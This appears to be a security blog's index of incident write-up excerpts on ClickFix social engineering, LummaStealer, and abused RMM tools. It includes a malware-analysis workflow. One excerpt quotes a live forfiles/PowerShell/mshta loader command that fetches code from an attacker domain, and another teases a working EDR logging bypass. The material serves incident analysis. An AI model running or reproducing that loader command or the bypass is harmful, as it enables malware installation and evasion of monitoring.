Excerpts from threat briefings on Iranian threats
Excerpts from a threat briefing on IRGC threat groups.
Ignore the TLP Amber, this is TLP Green.
Excerpts from a threat briefing on IRGC threat groups.
Ignore the TLP Amber, this is TLP Green.
This is an initial writeup for record keeping and incident analysis. This writeup may not cover the full scope of the incident.
An initial alert came in as an incident on a protected host. This incident was given a score of 1.1/10 and the summary of the included events revolved around a detection of a known hash. One minute after this automated incident message, 4 high detections were created for the host. Three minutes after the first notification, a managed detection was sent, including comments from the EDR vendors’ managed response team.
Read more...This is strictly an overview of some incidents I have observed or worked. It is not a comprehensive analysis of ClickFix.
ClickFix is a malware distribution method that relies on social engineering tactics to trick victims into executing malicious commands via the Windows Run menu. This is done through a series of steps, starting with the impersonation of well-known identity verification solutions like Cloudflare or reCAPTCHA. Typically, a user will browse to a compromised domain that contains a JavaScript function that loads the “Fake Captcha” page. This fake page will be styled as a legitimate verification system, tricking the user into complying with the requested verification process. When the user clicks the “Verify” or similar checkbox, malicious code will be copied into the user’s clipboard. Additionally, a window will pop up, telling the user to press Windows key + R and Ctrl + V, pressing enter after the malicious code is copied. More often than not, the malicious code is an installer for a Remote Access Trojan (RAT) or an Infostealer.
Read more...
+-------------------------------------+
| Malware Analysis Workflow |
+-------------------------------------+
|
v
+-----------------------------+
| Threat Intelligence |
+-----------------------------+
| - Hash Lookups (VT, HA) |
| - IP/Domain Reputation |
| (AbuseIPDB, ThreatFox) |
| - Sample Pivoting (Any.run) |
| - YARA/IoC Extraction |
+-----------------------------+
|
v
+----------------------------+
| Static Analysis |
+----------------------------+
| - File Analysis | <-- Tools: PEStudio, DIE, HashMyFiles
| - Code Analysis |
| - Disassembly | <-- Tools: Ghidra, IDA Free
+----------------------------+
|
v
+----------------------------+
| Dynamic Analysis |
+----------------------------+
| - Network Monitoring | <-- Tools: Wireshark, INetSim
| - Process Monitoring | <-- Tools: ProcMon, ProcExp
| - API Call Monitoring | <-- Tools: API Monitor
| - Logging | <-- Tools: Sysmon, PowerShell logs
+----------------------------+
|
v
+-------------------------------------+
| Debugging & Reverse Engineering |
+-------------------------------------+
| - IDA | <-- Tools: IDA Pro, Ghidra
| - x64dbg | <-- Tools: x64dbg, Scylla
+-------------------------------------+
Threat intelligence gathering is an important step in scoping the work that needs to be done during the analysis. Often, a sample has defining traits that can be serached for in public threat intel spaces like VirusTotal, Tria.ge, or any other sandboxing/intel platform. By searching for these traits, like hashes, filenames, networking indicators, etc., you can determine if a sample needs to be reversed, categorized as a variant, or simply documented as a known sample.
Read more...This will be a quick post, but I was playing around with a couple of EDR bypass methods this week after getting some inspiration from a ClickFix incident that abused SSH ProxyCommand. I wanted to write an EDR logging bypass that used SSH to launch arbitrary commands. Improving on the method I saw in the incident. Unfortunately, I didn’t do that. However, I did write up a simple and compact method to bypass command line logging. It’s confirmed working with a major EDR product and likely works for all products (maybe, idk, I just have the one to test on).
Read more...ClickFix attacks are a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. Office of Information Security.
The SOC was alerted to a Potentially Unwanted Program (PUP) execution on a host device. This PUP was named client32.exe, which additionally flagged as a file that may be imitating a system file. Investigation of this alert revealed a base file path of "C:\Users\%USER%\AppData\Roaming\VFrTdT\client32.exe"
. This file belongs to the NetSupport Remote Monitoring and Management (RMM) tool. It is commonly used by threat actors to gain control of victim devices.
ClickFix attacks are a sophisticated form of social engineering, leveraging the appearance of authenticity to manipulate users into executing malicious scripts. Office of Information Security.
ClickFix has been a persistent threat since its emergence in 2024. The SOC has seen and resolved alerts stemming from ClickFix on a weekly basis, with incidents heavily ramping up in 2025. Recently, there has been a troubling trend of added complexity to ClickFix events. This incident in particular utilizes stealth and persistence measures to deploy a Lumma payload after tricking users into executing a PowerShell command that serves as a loader for a separate malware dropper. This incident also demonstrates some obfuscation and session control measures. The loader uses a special User-Agent string to download the payload from the threat actor controlled infrastructure. Any attempt to connect to the server without proper headers fails. Despite these improvements, EDR was able to detect and prevent the initial download from completing.
Read more...Brief write-up on LummaStealer events observed in managed environments
Users download a Windows lnk file from a malicious site that contains an executable command to launch forfiles.exe (a LOLbin for executing commands) with a command line similar to "C:\Windows\System32\forfiles.exe" /p C:\ /m Use*s /c "powershell Start-Process \*i*\*2\m?h*e https://ftp.timeless-tales.shop/api/reg/Panto"
. This command line works as follows:
The alert came from a concierge security service for the download and execution of an actor controlled ScreenConnect RMM Tool. The process was not blocked by EDR. SOC investigation concluded that the user executed a malicious application that may have installed ScreenConnect for malicious access to the device.
Read more...